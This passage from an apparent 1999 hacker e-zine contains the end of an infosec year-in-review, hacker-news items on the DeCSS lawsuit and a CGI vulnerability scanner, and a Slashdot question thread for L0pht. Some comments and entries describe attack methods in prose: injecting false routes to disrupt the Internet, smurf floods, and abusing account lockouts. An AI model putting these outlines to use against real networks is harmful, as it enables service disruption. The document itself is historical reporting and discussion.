security holes were demonstrated on Microsoft�s Hotmail system, which the
company claims to be the biggest free Web-mail system in the world, with
millions of subscribers.

The problems were as follows: (1) An error in the code for entering data
into a form allowed a user login without any password at all; (2) An
undocumented back door allowed anyone to log in to any Hotmail account
using the
canonical (or possibly Canadian) password "eh." These
problems meant that all unencrypted Hotmail e-mail was readable to anyone
who used the exploits, and that such people could also impersonate their
victims through e-mail. The holes caused Microsoft to shut down access to
Hotmail for a day while the vulnerabilities were removed.

Availability Issues (Not Denial-of-Service)
3.01.99 Jerry Leichter
pointed out in RISKS that URLs are an unstable form of reference to
scholarly work. He cited a case in which interesting papers disappeared
from an academic Web site when the sponsoring research was disbanded. He
also worried about using commercial sites as repositories for papers,
arguing that the vicissitudes of the market make the destiny of such
storage uncertain at best.

10.20.99 The Encyclopaedia Britannica opened its long-awaited free Web
site�www.britannica.com�which immediately crashed because an order of
magnitude more people tried to access the site than expected.

Java, Javascript, ActiveX, Mobile Malicious Code
1.15.99 Drs. Edward
Felten and Gary McGraw published a new book about mobile code security.
In addition to the physical book, Securing Java: Getting Down to Business
With Mobile Code, these experts put the entire text online at
www.securingjava.com. The hope was that the free edition would not harm
sales of the paper book.

8.03.99 Because Microsoft believes that word processing, spreadsheet and
presentation software should allow automatic execution of macros�thus
turning these products into programming languages�they also allowed their

Internet Explorer browser to load these programs without alerting users.
In August, Microsoft scrambled to issue patches to correct this design
flaw so that unwary users would not be subjected to hostile code merely
by downloading documents from a hostile Web site or by reading e-mail
attachments. The principle still stands: Don�t double-click attachments
of uncertain origin or unvalidated safety.

RFI, Jamming (Not Interception)
1.29.99 In Crystal River, Fla., an
innocent user unknowingly blocked all other cellular calls in his area
whenever he used his new cell phone. The outages lasted 10 days while GTE
tracked the problem down to his phone, which they replaced. This case
illustrates the susceptibility of the highly computer-dependent
cellular-phone system to disruption.

4.16.99 Automatic garage doors in a six-mile radius of the port at
Hobart, Australia, were shut down by the USS Carl Vinson�s powerful
310-320 MHZ communications transmitters�which happened to override the
short-range
electronic communications channel allocated by the
Australian regulatory bodies for such devices as garage-door openers. In
addition, one poor soul was unable to move his car when the transmissions
overrode his car security system, locking the vehicle down until the huge
ship left.

Operating Systems, Network Operating Systems, TCP/IP Problems (Alerts)

1.12.99 Microsoft admitted that its Windows 95, Windows 98 and Windows NT
operating systems contained a bug in the MSVCRT.DLL file that would delay
the start of daylight savings time by a week on April 1, 2001. The April
Fool�s bug would affect about 95 percent of all PCs in the world, but
could be fixed by patches that were posted on the Web by Microsoft.

7.26.99 CERT/CC issued an alert on buffer overflow vulnerabilities on
several UNIX systems, including Solaris and HP-UX. Using this violation
of memory array restrictions, criminal hackers could plant logic bombs
and back
doors on victimized systems. Manufacturers scrambled to
provide patches.

Denial-of-Service
1.12.99 According to an article by Tim Barlass in
the Daily Telegraph of Australia, someone launched a sustained smurf
denial-of-service attack on Ozemail, a popular Australian ISP. A smurf
attack uses widely available software written by criminal hackers to send
ping packets with forged origination in the headers to a (usually major)
corporate network�s broadcast address. Every device�perhaps hundreds or
thousands in all�sends a reply packet to the forged originator address.
That system thus receives a flood of packets, often overloading its
TCP/IP stacks and resulting in denial-of-service.

The attack disrupted e-mail service for users in Sydney. A company
spokesperson said Ozemail was trying to track down the perpetrator and
was considering installing filtering software to prevent future attacks.

2.12.99 USA Today reported that Hotmail and Yahoo, providers of free
e-mail, were improving security by shutting down any account subject to
several unsuccessful attempts to log in. This is one of the oldest
mistakes in systems
management, since it immediately opens each
account to a trivially easy denial-of-service attack: Simply try to log
on several times to a victim�s account with a wrong password, and voil�,
no further legitimate access is permitted until the account is reset.

Web Attacks, Vandalism
1.16.99 Daniel Tobias was startled when a
colleague complained that Tobias�s Web page included a link to a
pornographic Web site. Indeed, one of Tobias�s originally inoffensive
links was redirected to a porn site. The problem turned out to be Web URL
hijacking: The original owner of a domain either sold its domain to the
pornographer or allowed the domain registration to lapse. The new domain
owner programmed his Web site to point all references to the original
pages at the original domain to his home page, instead of returning a
"404 Not Found" message.

10.26.99 A criminal hacker or hacker group calling itself "phreak.nl"
attacked U.S. Web sites in the last week of October. According to a
Newsbytes article by Bob Woods, the criminals damaged Web sites of NASA�s
JPL, the
U.S. Army�s Redstone Arsenal�s Program Executive Office and
the National Defense University. All these sites were described by a
hacker-publicity group, Attrition.org, as running Windows NT servers.

The defacements consisted of the usual puerile sneers and insults in the
peculiar spelling affected by the criminal hacker subculture. One common
theme was the notion that "phreak.nl" was engaged in "a game ... called
hack the
planet." In addition to these attacks, phreak.nl also
damaged sites for All Timeshare, Pet GBets and WPYC.

Intrusion Detection Systems
7.29.99 A major row broke loose in the
privacy community when the Clinton administration and the FBI announced
their Federal Intrusion Detection Network (Fidnet) initiative to monitor
network intrusions on not only government systems but also critical
infrastructure components such as banking, communications and transport.
House Majority Leader Dick Armey (R-Texas) attacked the Fidnet proposal,
and the House Appropriations Committee removed funding for the project
from its versions of the relevant appropriations bills.

In August, one of Fidnet�s main architects spoke out in defense of the
plan. Richard Clarke, National Coordinator for Security, Infrastructure
Protection and Counterterrorism, explained that fears of an "electronic
Pearl Harbor" (a
term popularized by Winn Schwartau of infowar.com
in the early 1990s) led to Presidential Decision Directive 63 and that
Fidnet was one of the first major computer security programs proposed in
response to the Directive. He assured skeptics of minimal involvement of
the FBI, saying that Fidnet would be managed by the National
Infrastructure Protection Center (NIPC), not the Department of Justice,
and would not intrude on personal or corporate privacy. On Sept. 27, Rep.
Armey sent another challenge to the DoJ demanding clarification of
critical elements of Fidnet.

Surveys, Estimates
2.23.99 The annual Australian Computer Crime and
Security Survey, organized by the Victorian Computer Crime Investigation
Squad and Deloitte & Touche Tohmatsu, reported on computer crimes in 350
of the largest Australian companies. In brief, the report found that about
one-third of the respondents had suffered one or more attacks on their
systems in 1998; of those, 80 percent had experienced insider attacks,
while 60 percent had experienced outsider attacks.

About 15 percent of the respondents that had experienced attacks said
they had been the targets of industrial espionage. Almost three-quarters
of all the respondents had no formal policy requiring notification of
police authorities
in case of attack. More than one-fifth of all
respondents had experienced a breach of confidentiality; one-fifth also
experienced a breach of data integrity.

4.07.99 The Fourth Annual Computer Security Institute/Federal Bureau of
Investigation (CSI/FBI) Computer Crime and Security Survey demonstrated
yet again that computer crime is a growing problem for U.S. companies,

financial institutions and government agencies. Losses amounted to
hundreds of millions of dollars, much of it resulting from industrial
espionage. Among the survey�s key findings:

� 26 percent of respondents reported theft of proprietary information.

� System penetration by outsiders increased for the third year in a row;
30 percent of respondents reported intrusions.

� Those reporting their Internet connection as a frequent point of attack
rose from 37 percent of respondents in 1996 to 57 percent in 1999.

� Unauthorized access by insiders rose for the third straight year; 55
percent reported incidents.

� More companies�32 percent compared with 17 percent in the past three
years�are reporting serious cybercrimes to law enforcement.

7.01.99 A survey of readers of this magazine confirmed that organizations
conducting Internet e-commerce experience far more information security
breaches than those that do not conduct e-commerce. Among other findings,

the study found that companies conducting business online are 57 percent
more likely to experience a leak of proprietary information, and 24
percent more likely to experience a hacking-related breach. Overall, the
number of companies hit by an unauthorized access breach increased nearly
92 percent from 1998 to 1999. Average loss per company to security
breaches was $256,000.

7.12.99 InformationWeek surveyed 2,700 information technology
professionals in 49 countries on a variety of security-related issues.
Among the highlights:

� 64 percent of companies fell victim to a virus attack in the past 12
months, up from 53 percent the previous year.

� In the U.S. alone, viruses hit 69 percent of companies, about four
times as many as that of the next-highest category of security breach:
unauthorized network entry.

� 22 percent of companies reported no security breaches at all.

� 48 percent of respondents blamed hackers for security breaches, up from
14 percent in 1998.

� 31 percent of respondents blamed contract service providers for
breaches (up from 9 percent in 1998).

� 41 percent blamed authorized users and employees (down from 58 percent
in 1998).

8.01.99 ICSA.net�s Fifth Annual Virus Prevalence Survey found that the
likelihood of a company experiencing a computer virus more than doubled
for each for the past four years. Approximately 43 percent of respondents
had
experienced a "virus disaster," defined as 25 or more PCs or
servers infected at the same time. Slightly less than two-thirds of the
latest virus disasters experienced were caused by macro viruses infecting
Microsoft Word and Excel files. In 1999, more than half of the survey�s
respondents encountered viruses via e-mail in their virus disasters, a
significant increase over previous years.

Acceptable-Use Policies, Spam Wars (Corporate)
6.14.99 GartnerGroup
surveyed 13,000 e-mail users around the world about their experiences
with spam. The results were alarming:

� 90 percent of the respondents received at least one junk e-mail per
week.

� 96 percent of those online for four years or more received junk e-mail
at least once a week.

� 33 percent got between six and 10 junk messages a week.

� ISPs lose approximately 7 percent of their new users every year because
of disgust with spam.

� 40 percent of the respondents agreed that spam should be banned.

� 25 percent said that spam should be regulated.

� 3 percent of the respondents enjoyed it to some extent.

Crypto Algorithm Weakness, Brute-Force Attacks
1.19.99 Under the
direction of John Gilmore, a team from the Electronic Frontier Foundation
(EFF) and Distributed.net cracked RSA Data Security�s DES Challenge III
in 22 hours, winning a grand prize of $10,000. The decryption was a
demonstration of the weakness of the DES and a blow against the U.S.
government�s restrictions on the export of strong encryption products.

8.16.99 Adi Shamir (the "S" in RSA) of the Weizman Institute of Science
in Rehovot, Israel, announced a successful brute-force attack on a
512-bit RSA private key; the cryptanalysis took seven months and required
292
computers at 11 different sites.

However, Shamir also described the theoretical design for a $2 million
cryptanalytic computer called "TWINKLE" that could apply brute-force
attacks successfully to RSA keys of 512 bits or less in less than a week.

New I&A Products (Tokens, Biometrics, Passwords)
1.01.99 Scientists
in Britain established the uniqueness of ear-cartilage patterns and
successfully prosecuted a burglar who put his ear to a window to detect
sounds in the home he burgled. The thief murdered a 94-year-old woman and
was consequently sent to prison for life. The police authorities had
gathered 1,200 ear prints from volunteers by the end of 1998 and were
hoping to begin collecting ear prints from suspects.

Cryptography Exports From the U.S.
9.16.99 President Clinton issued
a public letter addressed to Congress that pushed for passage of the
Cyberspace Electronic Security Act of 1999 (CESA), which simultaneously
deregulates most encryption software exports and provides for key escrow
accessible to law enforcement agencies under warrant.

Key Escrow/Recovery Laws
4.09.99 Andrew Fernandes of Cryptonym, a
Canadian security firm, seems to have gone off half-cocked when he found
a signing key for integrating cryptographic modules into Windows that was
labeled "NSAKey." He and other conspiracy buffs interpreted this label to
mean that there was somehow a back door into Windows that would allow the
National Security Agency to integrate its own cryptographic modules into
the operating system, yet have the version check out using digital
signature verification. Such manipulations could generate versions of
Windows with a back door for the NSA.

Microsoft denied this interpretation and claimed that the key was
"compliant with the NSA�s technical standards." A particularly clear
discussion by Russ Cooper on NTBugtraq pointed out that the conspiracy
theory was
farfetched, but warned that it would indeed be possible
for anyone to insert their own cryptographic modules into Windows and
sign them using their own digital key. This would allow foreign crypto to
run under Windows even without signature by Microsoft or approval by the
U.S. Department of Commerce under the Export Administration Regulations
(EARs).

Privacy, Privacy Legislation
4.16.99 Kevin Cooke, development
manager at Wired magazine, discovered that Microsoft�s Internet Explorer
version 5.0 sends information to a Web site when the user bookmarks the
site�s URL. In an interview with Chris Oakes of Wired, Microsoft product
manager Mike Nichols said, "This is one of those things where we did not
see the privacy issue when we were creating the feature. The feature
doesn�t pose a super-huge risk. But Microsoft is looking at ways of
modifying this feature in future releases." Apparently, the feature was
designed to allow a Web site to supply an icon to be stored on the user�s
system so any "Favorite" would be "branded" with that icon.

11.03.99 RealNetworks admitted that it had been collecting information
about exactly what users of its RealJukebox player were listening to. The
company did not inform users of the monitoring, and got hammered by its

competitors, privacy advocates and many users. The company immediately
changed its public privacy statement to let people know about the data
collection function, and its spokesperson swore that the data had been
aggregated so that no one could trace the specific interests of any one
user. The company immediately apologized to the public for the concerns
it had caused, and provided a patch to disable detailed reporting.

Review in Review
While this article gives you a glimpse of some of
the significant developments in the field of infosecurity in 1999, there
is no way to include an excerpt from each category of the full report.
However, the full Infosec Year-in-Review database (see www.icsa.net)
classifies hundreds of cases and issues spanning the field of information
security. I encourage you to download the full PDF file in early 2000 for
further review and discussion of the events of 1999.

M. E. Kabay, Ph.D., CISSP (mkabay@icsa.net), is director of education for
ICSA Labs.

Footnotes:
These malicious programs are called "virus/worms" because they integrate
into the operating system (i.e.,they are virus like), but also replicate
through networks via e-mail (i.e., they are worm-like). (return to top)

See Bruce Schneier's Crypto Year-In-Review column for further discussion
of 1999 cryptography events.

@HWA

21.0 Butchered From Inside 7 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by del0rean
Butchered From Inside is an electronic publication of
free speech and distribution. Issue #7 has just been
released and it includes articles on spoofing, CCC Camp
review, Gork, and WinnAMP. Sorry, it is in Italian only.

Butchered From Inside
http://www.s0ftpj.org/bfi

@HWA

22.0 DVD Industry Sues over 500 Defendants in Anti-Piracy Lawsuit 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Mazzic and Macki
The DVD Copy Control Association, Inc., (DVD CCA) a
non-profit trade association, has named 21 defendants
and 500 John Doe's in a lawsuit filed in Santa Clara
County Superior Court. The lawsuit alleges that the
defendants misappropriated 'trade secrets' and
'proprietary information' and distributed the information
via their web sites. The defendants, by posting DeCSS
software, caused the illegal pirating of the motion
picture industry's copyrighted content contained on
DVDs.

E-mail from the California law firm Weil, Gotshal &
Manges, LLP notified the defendants late yesterday
afternoon that they are seeking a restraining order from
the court.

DeCSS was independantly developed in Norway earlier
this year. The software allows the playing and copying
of DVD movies on Linux computer systems. Apparently
the mirroring of the DeCSS software was enough to turn
ordinary people into criminals who want to destroy the
entire motion picture industry and ruin all that is good in
the world.

(I would really like to know how a county court can
process an injunction that is valid in 12 states and
eleven countries?)

HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html

2600.com - One of the defendants
http://www.2600.com/news/1999/1227.html

DeCSS Defense Site
http://www.lemuria.org/DeCSS/

DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

@HWA

23.0 Web Based CGI Vulnerability Scanner Released 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by webmaster
Check your web site (or anyone else's) for 64 known
CGI vulnerabilities in seconds. If you have new
vulnerabilities not included in the scanner you can
submit them here mailto:webmaster@digital-harmony.com

Web Based CGI Scanner
http://www.nobullshit.org/

@HWA

24.0 L0pht Interviewed by Slashdot
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Joey
L0pht Heavy Industries, the premier hacker think tank,
has been honored by Slashdot as the next victim in their
community interview process. So far many of the
proposed questions are very interesting and should illicit
some great responses. Ad your voice to the fray.

Slashdot.org
http://slashdot.org/article.pl?sid=99/12/27/1015213&mode=thread

I've reproduced the 'interview' here but the format is a real
mess and i'd have to spend hours editing it, so just follow along
best you can or go to the link it should lead you to the archived
version on Slashdot, here it is unformatted. - Ed

This discussion has been archived. No new comments can be posted.
Shutting down the Internet (Score:3, Interesting)
by papo (papo@uninet.com.br) on Monday December 27, @12:04PM EST (#1)
(User Info)
You said in an interview that it's possible to shut down all the Internet. How you possibly might do that? With a DoS attack in some routers or by taking command of some servers in the principal backbones of the USA?

"Learning, learning, learning - that is the secret of jewish survival" -- Ahad A'Ham
Re:Shutting down the Internet (Score:1)
by merky1 on Monday December 27, @12:07PM EST (#5)
(User Info)
If I can add to this.. What event would cause you to take down the internet?
--WooooHoooo--
Re:Shutting down the Internet (Score:3, Informative)
by jd on Monday December 27, @12:16PM EST (#20)
(User Info)
That one's easy. Very few routers have authoritive checks set up. Simply fire up a router such as gated and have it inject false routes into the net. Have the backbone located at the South Pole, for instance.

The UK network's been crashed dozens of times, by this. Usually by poor network administration, or faulty software, but that's just details. What an admin can do through ignorance, I'm sure crackers could do by design.
Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @02:29PM EST (#111)
hmm... something about poisoning BGP tables?
Re:Shutting down the Internet & a question 2 L0pht (Score:1)
by EchoMirage on Monday December 27, @03:55PM EST (#136)
(User Info)
Many/most people that laughed at this claim forget that computer networks operate almost identically to power grids. By taking out all the Cisco routers, for instance, you might only take 30%-50% of the networks, but as other networks
attempt to fail over and become dependant on the still live networks, those networks, routers, and servers become overloaded with the traffic and start to fail. It's a domino effect. This is the reason when someone with a backhoe cuts a major
cross-continental fibre line, the rest of the Internet, especially in nearby affected areas, slows to a crawl because other networks failing over to another backbone creates a strain on those lines and equipment. Now, for my question to L0pht:
What, in terms of network design, do you see as the single biggest threat to security?
Re:Shutting down the Internet & a question 2 L0pht (Score:0)
by Anonymous Coward on Tuesday December 28, @08:42PM EST (#222)
the lack of attention to detail.
Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @01:38PM EST (#82)
I think there is a better question. First, the claim is a bit of a braggadocios, it's easy to talk and the statement is pretty vague to begin with. That is sort of the nature of cracking community. I'm not going to say that it's not possible, corrupting
router tables is a very good place to start and there are probably a few computing centers wher a good DoS attack could seriously hamper internet traffic but those aren't really crashing things and they usually don't last that long. There is a huge
difference between cutting down the performance and making lots of traffic go through smaller pipes and crashing or stopping the net, the bigger it becomes the more reliable it becomes. As more and more infrastructure become dependent on
the net, the net becomes more and more connected and more and more security is placed on more important pieces. Companies like AOL,TCI/ATandT,Qwest,mindspring,Amazon, etc... have substantial financial insentive to protect the net,
secure their servers and network infrstructure, and have staff on duty ready to catch and fix problems as soon as they happen.

15 years ago, you could have easily attacked one router and substantially crippled the net, you could have went after 5 or 10 and pretty much shut it down. It is so much more connected today than it was then, you can cut a couple of major
channels and there are others that stay up. There is no longer one east-west network pipe, there are numerous pipes and it keeps getting more and more connected. Take that major power-outage that cut power to most of the western US and
parts of Canada a couple years back, the internet didn't blink.

If you do believe that you can crash it, how much longer do you think it will stay that way? Or do you even think that it is progressing towards a much more stable and crash-resistant infrastructure, please explain. Then on the ethics side (sorry
to over shoot the one q per post rule) if you do believe you can do it, what have you done to get the problems fixed or at least publicize the methods so they can be corrected for? I would think that it would be good for business to take credit
for stopping a potentially huge network shutdown.
Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Tuesday December 28, @08:50PM EST (#223)
I have experienced the provider's, "...substantial financial insentive to protect the net, secure their servers and network infrstructure..." And I don't like it, at all. I had one of the listed providers with a misconfigured (or 0wned) that was allowing
source routed packets to my machines. The, " ...staff on duty ready to catch and fix problems as soon as they happen... " , was quite willing to disable source routing, after I informed them of the invalid packets. I think the main lesson here is:
When you assume, it makes an ASS out of U and ME.
Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @01:38PM EST (#84)
Read this comment.
Re:Shutting down the Internet (Score:1)
by batz (batz@vapour.net) on Tuesday December 28, @06:11PM EST (#221)
(User Info) http://www.vapour.net
Appologies for the flagrant plug, but this was covered indepth at Blackhat '99 in Las Vegas. All the presentations are online, including mine, which detailed problems with the way that BGP is designed, implemented and configured. It's all
available at www.blackhat.com

They made this claim almost 2 years ago. I wouldn't speak for them, but it's kinda like asking yelling "Ziggy!" at a David Bowie concert.
-- batz Chief Reverse Engineer Superficial Intelligence Research Division Defective Technologies
Y2k Hacking (Score:3, Interesting)
by merky1 on Monday December 27, @12:04PM EST (#2)
(User Info)
Do you agree with the President's plea to cease hacking activities for Y2K, and do you think it will have an adverse affect?

"Those [filthy|pagan|heathen|whiny] americans, I'll show them....."

--WooooHoooo--
Job offers (Score:1)
by eyeball on Monday December 27, @12:07PM EST (#6)
(User Info) http://www.spacehaven.com
Whenever the subject of securing our web servers comes up at work, someone inadvertently says "We should hire one of those L0pht guys." As if you have nothing better to do than to work for a starving second-rate e-commerce IPO. My
question is: Do you get job offers like this? If so, how does it feel? Do you refer them somewhere?
I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.
Re:Job offers (Score:0)
by Anonymous Coward on Monday December 27, @12:59PM EST (#54)
"How does it feel?"

What a bizarre question. Well, let me give an answer. I'll answer it in as much detail as possible so you can really get a good sense about what a job offer from a second-rate IPO e-commerce outfit feels like. Pay close attention. It's best to
read this twice, as it will take at least two readings for your imagination to kick in. (I say this because from the sound of the question -- asking how a job offer feels -- I get the sense that (a) you're still in college and have not had a job offer, (b)
are working at a job and are a little slow, or (c) are truly a blockhead and have no idea how the real world works and that, well, a job offer doesn't feel like much -- or at least not much that is easily quantifiable.)

So, this is what it feels like:

It feels all tingly. It feels like when you're in the ocean and you've been swimming out away from the beach for about 20 minutes, and then suddenly you turn back toward shore, swim for another 20 minutes, and then get up on the beach and
walk to the beach house for a nice, cool Pina Colada.

That's about the closest I can describe it.

Well, okay, not entirely true. It feels like when you've been standing on a train platform on a cold morning and then the train comes whooshing by and kicks up a tiny pebble which zings toward your face, hits your glasses, cracks the lens, and
then zigs to the right and dings your nose.

It feels the way your nose feels after the pebble has fallen back to the platform and you're standing there -- standing wearing your goose-down winter coat, your thick gloves, and carrying your briefcase -- and you must walk up the steps into
the train vestibule with a horde of other commuters.

The ding from the pebble stings -- but only a little bit -- but you're more worried about whether or not the pebble caused your nose to bleed (you can't tell because you have gloves on) -- but you're self-conscious since people are looking at
you, and you're not sure if they're looking at you because your glasses are cracked, because the side of your nose is bleeding, or because you look a little shell-shocked because you just got whipped by a pebble shot up from the steel wheels of
the train.

That's about the best way to describe how the job offer from a second-rate outfit feels like.

Re:Job offers (Score:1)
by eyeball on Monday December 27, @02:28PM EST (#109)
(User Info) http://www.spacehaven.com
Haha. Wow, that good? I wonder how it feels when the stock options kick in. :)
I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.
Re:Job offers (Score:1)
by |deity| on Monday December 27, @08:49PM EST (#181)
(User Info)
I know this is a little off topic. I'm a student, working on a degree in computer science I would like to work in the security field where should I start? What kind of things should I be doing to prepare myself for a job in this field. I've been
programming for about nine years in various languages.
Re:Job offers (Score:1)
by eyeball on Monday December 27, @09:13PM EST (#182)
(User Info) http://www.spacehaven.com
2 pieces of advice:

1) start as a network/sysadmin and prove yourself
2) don't take advice from anyone, especially mine :)

I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.
Re:Job offers (Score:0)
by Anonymous Coward on Wednesday December 29, @08:02AM EST (#228)
Be a sys admin, do a security audit (hack your servers) and tell your managers that they are vunrable, they will fear you (if they dont fire you) then tell them they sould have a full time security tester (Then make that your job title).
Which do you consider more dangerous (Score:5, Interesting)
by Gleef (gleef@capital.net) on Monday December 27, @12:09PM EST (#7)
(User Info) about:mozilla
Which do you consider more dangerous to personal liberties on the Internet, national governments or multinational corporations, and why?

----
Open mind, insert foot.
Um (Score:1)
by Synn on Monday December 27, @12:10PM EST (#8)
(User Info)
How the frag do you pronounce L0pht? And what the hell does it mean? Somebody write me a perl warez filter for pete's sake. All this kewl l33t drek is driving me insane.
Re:Um (Score:1)
by GeorgeH (georgeah@nOsPaM.home.pLeAsE.com) on Monday December 27, @12:19PM EST (#25)
(User Info) http://slashdot.org/comments.pl?sid=GeorgeH
Ell Zero Pee Aitche Tee
L 0 P H T : PH = F (in crazy english)
L0FT : 0 = O (in crazy 1337 5p33k)
loft
1 : an upper room or floor : ATTIC
2 a : a gallery in a church or hall b : one of the upper floors of a warehouse or business building especially when not partitioned c : HAYLOFT
3 a : the backward slant of the face of a golf-club head b : the act of lofting
4 : the thickness of a fabric or insulating material (as goose down)

--
I hate spelling and grammar nazis.
Re:Um (Score:2)
by bbk (insert@pithy.email.obfuscation.here) on Monday December 27, @12:22PM EST (#29)
(User Info)
l0pth is pronounced "loft" - synonomous with attic. l0phters are people who dumpster dive looking for computer parts, usually in large companies trash bins, and carry the parts back to their l0pht where they use them.

I've l0phted a couple monitors and cases from my ever so friendly ECE department before... It's a great way to get an eclectic computer collection for very little!
Re:Um (Score:2)
by BradyB (bradyb@mailandnews.spam.com) on Monday December 27, @12:24PM EST (#33)
(User Info)
I always thought that L0pht stood for LOW PHAT as in Low fat as in high speed low drag.
Good is never good enough when you dream of being the best.
Just out of curiosity... (Score:1)
by Ater (ater@nospam.goatse.cx) on Monday December 27, @12:10PM EST (#9)
(User Info) http://www.redrival.com/ater
Where did you guys come up with the name, "the l0pht?" Does the 0 in it (as opposed to an O) have some special significance?

--- Do you want to change your name to Homer Jr.? The kids can call you Ho-Ju! ---
0 is �. (Score:0)
by Anonymous Coward on Monday December 27, @05:42PM EST (#158)
Well - According to l0pht's logo. L0pht is actually written L�pht. � is scandinavian.
Re:0 is �. (Score:1)
by Levine (bourgon@bigfoot.com) on Monday December 27, @06:12PM EST (#162)
(User Info)
Most CS people write their zeros with a line through it.

Levine
Re:0 is �. (Score:1)
by myconid (myconid@deletethispart.sover.net) on Monday December 27, @07:43PM EST (#178)
(User Info) http://www.myconid.com
Unless they have ever taken a math class in their life and realise 1-1 = Slashed 0 isnt true :-)

SB. (C) 2000
Re:0 is �. (Score:0)
by Anonymous Coward on Tuesday December 28, @02:32AM EST (#202)
oh oh, let the pre-calculus student in high school answer that one, � is nullset, or is that with the slash in the opposite direction? well, as someone put it in another post, do not take anyone's advice, especially mine
Re:0 is �. (Score:1)
by Levine (bourgon@bigfoot.com) on Wednesday December 29, @09:26PM EST (#236)
(User Info)
CS people differentiate between an O and a 0 (an 'oh' and a zero) by slashing the zero. If it's wrong, so be it. It still happens.

Levine
Re:0 is �. (Score:1)
by generic (larry@[n0sp4m]adm3.com) on Monday January 03, @01:36PM EST (#239)
(User Info)
or is it theta?
Future of Security (Score:0)
by Anonymous Coward on Monday December 27, @12:10PM EST (#10)
What do you think will be the future of computer security ? Encryption ? I don't think it'll be enough... What we'll be doing to protect our data ?
Private wireless networks (Score:3, Interesting)
by rise (jconway@ipopros.com) on Monday December 27, @12:12PM EST (#12)
(User Info) http://www.ipopros.com
The L0pht has been involved in independent wireless networking reasonably heavily. What do you see as the most important discoveries/protocols/designs for the next few years? Do you forsee an opportunity for the hardware hacking
community to open up the airwaves in the same way Linux & OSS has opened up operating systems and tools?
L0phtCrack (Score:2)
by OnyxRaven (onyxraven@nospamhere.netscape.net) on Monday December 27, @12:13PM EST (#14)
(User Info) http://www.prolynx.com/onyxraven/
At work we recently purchased a copy of L0phtCrack (Guess what - it has saved many many hours of work for me especially!) - for $99? Are you guys making a killing off of this tool or what?
~Nth Dimension~
Distributed Computing (Score:3, Interesting)
by jake_the_blue_spruce on Monday December 27, @12:13PM EST (#16)
(User Info)
Moore's law is that computing power doubles every eighteen months. At the same time, parallel processing and distributed computation ( Cosm & Distributed.net) are becoming increasingly common. This leads to an abundance of cheap
computing power, enabling brute force attacks on secure systems. In light of these developments, do you see username/password pairs being replaced by anything more resistant to such brute computing force?
"There's so much left to know/ and I'm on the road to find out." -Cat Stevens
Re:Distributed Computing (Score:1)
by jake_the_blue_spruce on Monday December 27, @12:15PM EST (#18)
(User Info)
Shoot. Cosm is at http://cosm.mithral.com/. I thought I checked that link.
"There's so much left to know/ and I'm on the road to find out." -Cat Stevens
Pronounciation (Score:2, Interesting)
by RAruler (cannabis at home dot com) on Monday December 27, @12:14PM EST (#17)
(User Info)
At one point I thought it was
"low-fight" but somewheres I remember it being said as "loft" which would make more sense as
L=L
0=O
PH=F
T=T
LOFT
This post uses only 100% recycled electrons.
Re:Pronounciation (Score:1)
by norkakn on Monday December 27, @10:06PM EST (#189)
(User Info)
Hey, better than me...
for a while i thought it was "'low fat' heavy industries" with the pun... but then i actually heard the name somewhere *gasp*

jdobbie@kmfms
Re:Pronounciation (Score:1)
by splinter (dull_boy_jack@hotmail.com) on Tuesday December 28, @01:13AM EST (#200)
(User Info) http://www.deimos.org
read your douglas adams, fool.
Re:Pronounciation (Score:0)
by Anonymous Coward on Tuesday December 28, @01:09PM EST (#218)
well, a rather good interview of the crew, 4th Jan 99 BBC2 ( UK ) had it pronounced " the loft" as the pictures proved, their "den/lair" ( cant think of a better word ) it is infact a loft, in Boston. I hope this proves how, but I wonder why ? Why,
ya think it was Level zero Phreaking Hacking Team ?
Future Products (Score:1)
by MoOsEb0y (mooseboy@vqf.com) on Monday December 27, @12:15PM EST (#19)
(User Info)
What products and or projects are you considering in the future? Also, what happened to the wireless networking you were planning (and made a few steps to)? I have often considered setting up something similar to this on a local scale for a
few friends. But I think it'd be awesome to be able to be free of US Worst for my internet service.
advisories (Score:1)
by krog (gamache-at-mit.edu) on Monday December 27, @12:16PM EST (#21)
(User Info) http://web.mit.edu/gamache/www
you haven't released any security advisories lately. where do you get your nitrous? can i have some?
Re:advisories (Score:1)
by barleyguy on Monday December 27, @12:32PM EST (#39)
(User Info)
Nitrous is available as a product called "whip-its". It's manufactured for making whipped cream, but is usually sold at adult bookstores. I'm not sure exactly why....
--- istream >> ostream "We all scream for ice cream!";
Re:advisories (Score:0)
by Anonymous Coward on Monday December 27, @05:04PM EST (#152)
http://www.onepercent.com/whipit.html
That's where you can get your nitrous :)

--huge coward
Things to come... (Score:0)
by Anonymous Coward on Monday December 27, @12:18PM EST (#23)
Do you have a guesstimate as to when Operating Systems and protocols will make Information Security a non issue (from and attack and penetration perspective)? I have discussed this with my colleagues quite a bit and none of us can really
say.
This is not bait for Microsoft jokes, either.
Developers may eventually wisen up, the day that I hang my A/P hat and retire to a desk job because of this evolution is inveitable, but thankfully not in sight. I would appreciate some comments on this matter...

-jcw
Coagulation (Score:1)
by Raffy (rafe.digitaldiscipline@com) on Monday December 27, @12:19PM EST (#24)
(User Info) http://www.digitaldiscipline.com
L0pht-
As with any of the well-known infosec groups (you, cDc, &c), it's always a far-flung collective of folks who coalesce and make things happen. How did you meet and decide, "hey, we have common goals and interests, let's do this as a team"?
Rafe

V^^^^V

Opinions expressed by the author may not actually exist in the wild.
Re:Coagulation (Score:1)
by Synic (synic@linuxfreak.com) on Monday December 27, @03:13PM EST (#129)
(User Info) http://www.lanparty.com
The l0pht and cDc people live in the same city. The l0pht people live in the same building. :)

(as far I as I remember)

This info is on their web page.
